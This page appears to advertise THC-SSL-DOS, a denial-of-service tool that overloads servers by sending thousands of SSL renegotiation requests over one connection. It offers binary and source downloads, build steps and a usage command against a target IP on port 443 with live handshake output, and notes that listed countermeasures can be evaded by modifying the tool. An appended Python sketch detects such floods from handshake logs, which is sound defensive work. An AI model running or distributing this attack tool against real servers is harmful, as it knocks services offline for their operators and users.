DoS attacks on servers with SSL renegotiation enabled

This script acts on a security failure present in older (2003) versions of Apache. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. By exploiting this asymmetric property, the client sends thousands of renegotiation requests in the same TCP connection. When the server gets overloaded, it stops serving further requests. The attack is very cheap to execute in terms of hardware, as tests made with a single old machine showed.

Download:
Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix Source   : thc-ssl-dos-1.4.tar.gz

Use "./configure; make all install" to build.

Usage:
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Countermeasures:

No real solution exists. The following steps can mitigate (but not solve)
the problem:

  • Disable SSL-Renegotiation
  • Install SSL Accelerator

Either of these countermeasures can be circumvented by modifying
THC-SSL-DOS. A better solution is desirable. Somebody should fix
this.
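
On the server side, each renegotiation shows up as another handshake start on an already open TCP connection, so an operator can count handshake starts per connection and per client address and flag the outliers. The sketch below is an added example, not part of THC-SSL-DOS or the original page; the "time ip:port event" log format, the thresholds and the addresses are constructed assumptions.

```python
from collections import defaultdict, deque

def parse(lines):
    """Return time-ordered (timestamp, 'ip:port') pairs for handshake_start lines."""
    events = []
    for line in lines:
        ts, conn, event = line.split()
        if event == "handshake_start":
            events.append((float(ts), conn))
    return sorted(events)

def flag(events, key, limit, window):
    """Return {key: time at which more than `limit` handshakes fell within `window` s}."""
    recent, flagged = defaultdict(deque), {}
    for ts, conn in events:
        k = key(conn)
        q = recent[k]
        q.append(ts)
        while ts - q[0] > window:      # drop handshakes older than the window
            q.popleft()
        if len(q) > limit:
            flagged.setdefault(k, ts)  # remember only the first violation
    return flagged

def per_connection(conn):
    return conn                        # key on the full ip:port pair

def per_client(conn):
    return conn.rsplit(":", 1)[0]      # key on the client address only

def sample_log():
    """Constructed events in a hypothetical 'time ip:port event' format."""
    # One connection repeating the handshake every 0.5 s (the pattern described above).
    lines = [f"{i * 0.5:.2f} 198.51.100.7:40001 handshake_start" for i in range(10)]
    lines += ["0.20 203.0.113.9:51000 handshake_start",
              "30.00 203.0.113.9:51000 handshake_start",  # one later renegotiation
              "1.00 203.0.113.20:52000 handshake_start",
              "1.00 203.0.113.20:52000 close"]
    return lines

if __name__ == "__main__":
    events = parse(sample_log())
    # Assumed thresholds: tune against real traffic before enforcing anything.
    print("per connection:", flag(events, per_connection, limit=3, window=10.0))
    print("per client:    ", flag(events, per_client, limit=8, window=10.0))
```

The per-client count matters because the usage output above shows about 100 connections coming from a single client.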

Source: https://www.thc.org/thc-ssl-dos/
